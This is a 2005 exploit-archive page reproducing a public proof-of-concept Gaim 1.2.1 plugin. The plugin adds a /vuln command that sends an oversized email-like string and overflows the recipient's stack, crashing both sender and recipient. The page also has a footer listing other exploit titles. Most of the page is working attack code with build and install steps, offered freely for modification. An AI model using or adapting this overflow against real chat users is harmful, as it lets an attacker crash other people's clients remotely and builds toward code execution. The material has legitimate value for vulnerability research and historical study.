exploits , vulnerabilities , articles , Gaim 1.2.x URL Handling Remote Buffer Overflow PoC Exploit

2005-05-17

Gaim 1.2.x URL Handling Remote Buffer Overflow PoC Exploit

Rated as : Critical 

// Written by Ron <iago@valhallalegends.com>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow
vulnerability
// when processing email addresses. What this basically does is segfault
you when you
// do a /vuln command in a conversation, and, if you're using a protocol
that allows
// a 10002-character message to go through, also segfaults the person you
sent it to.
// The reason is that gaim's stack is overwritten with a whole bunch of
'A's, and
// the return address of the function ends up at 0x41414141. That's no
good for
// anybody.
//
// This code should be considered public domain, and is freely
modifiable/distributable
// by any and everyone.
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's
source
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so". This
will compile vuln-plugin.so.
// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.


#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <locale.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "internal.h"
#include "gtkgaim.h"

#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"

#include "gtkplugin.h"
#include "gtkutils.h"

#define ME "1.2.1 Vuln Check"
#define MAXLENGTH 1024
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for
 URL encoding vulnerability."

static GaimCmdId cmd;


char *code = "A@AAAA...(A*8192)...AAAAA";

gboolean go(GaimConversation *conv, const gchar *cmd, gchar **args, 
gchar **error, void *data)
{
gaim_conv_im_send(GAIM_CONV_IM(conv), code);

return GAIM_CMD_STATUS_OK;
}

static gboolean plugin_load(GaimPlugin *plugin)
{
cmd = gaim_cmd_register("vuln", "",
GAIM_CMD_P_DEFAULT, 
GAIM_CMD_FLAG_IM, NULL, (GaimCmdFunc)go, "/vuln", NULL);

return TRUE;
}

static gboolean plugin_unload(GaimPlugin *plugin)
{
gaim_cmd_unregister (cmd);

return TRUE;
}

static GaimPluginInfo info =
{
GAIM_PLUGIN_MAGIC,
GAIM_MAJOR_VERSION,
GAIM_MINOR_VERSION,
GAIM_PLUGIN_STANDARD, /**< type */
NULL, /**< ui_requirement */
0, /**< flags */
NULL, /**< dependencies */
GAIM_PRIORITY_DEFAULT, /**< priority */
NULL, /**< id */
N_("1.2.1 Email Overflow Demo"), /**< name */
VERSION, /**< version */
/** summary */
N_(""),
/** description */
N_(""),
"Ron <iago@valhallalegends.com>", /**< author */
"", /**< homepage */

plugin_load, /**< load */
plugin_unload, /**< unload */
NULL, /**< destroy */

NULL, /**< ui_info */
NULL, /**< extra_info */
NULL,
NULL
};


static void init_plugin(GaimPlugin *plugin)
{
}

GAIM_INIT_PLUGIN(XMMSPlugin, init_plugin, info) 
securitydot.net - 2005-05-17

Exploits - newest 10 RSS | More

2007-06-15 57100 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34089 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42244 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29256 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19688 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16639 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19342 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16520 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33520 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17165 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit